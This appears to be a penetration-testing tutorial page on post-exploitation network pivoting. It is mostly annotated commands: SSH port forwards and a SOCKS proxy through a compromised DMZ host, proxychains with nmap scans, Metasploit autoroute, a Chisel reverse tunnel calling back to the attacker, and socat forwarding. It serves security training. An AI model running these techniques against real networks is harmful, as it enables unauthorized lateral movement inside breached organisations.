⚠️ Pracivo Security Lab — Post-exploitation techniques for authorized penetration testing. Persistence, exfiltration, pivoting, LOLBins, C2 frameworks.
> Pivoting & Port Forwarding
NETWORK PIVOTING
# Pivoting = using a compromised machine to reach other network segments
# SCENARIO:
# Attacker (10.10.10.1) → Compromised DMZ Host (192.168.1.50) → Internal Network (10.0.0.0/8)
# Attacker can't reach 10.0.0.0/8 directly — must pivot through DMZ host
# METHOD 1: SSH Port Forwarding
# Local port forward (access internal service from attacker):
ssh -L 8080:10.0.0.5:80 ram@192.168.1.50
# Now: curl http://localhost:8080 → reaches 10.0.0.5:80 through DMZ host
# Remote port forward (expose attacker service to internal network):
ssh -R 4444:localhost:4444 ram@192.168.1.50
# Now: internal machines can reach attacker's port 4444 via DMZ host
# Dynamic SOCKS proxy (route all traffic through pivot):
ssh -D 1080 ram@192.168.1.50
# Configure proxychains: socks5 127.0.0.1 1080
proxychains nmap -sT 10.0.0.0/24
# METHOD 2: Metasploit pivoting
# After compromising DMZ host with Meterpreter:
run post/multi/manage/autoroute
# Or manually:
route add 10.0.0.0/8 SESSION_ID
# Now all Metasploit modules can reach 10.0.0.0/8
# METHOD 3: Chisel (fast TCP tunneling over HTTP)
# On attacker:
chisel server -p 8080 --reverse
# On pivot host:
chisel client 10.10.10.1:8080 R:1080:socks
# Attacker now has SOCKS proxy at :1080
# METHOD 4: socat (port forwarding on pivot)
socat TCP-LISTEN:8888,fork TCP:10.0.0.5:80 &
# Attacker connects to pivot:8888 → reaches internal 10.0.0.5:80
# METHOD 5: Ligolo-ng (TUN interface — most powerful)
# Creates a full network tunnel with proper routing
# https://github.com/nicocha30/ligolo-ng
# Check what internal networks are reachable from pivot:
ip route # Linux
route print # Windows
netstat -rn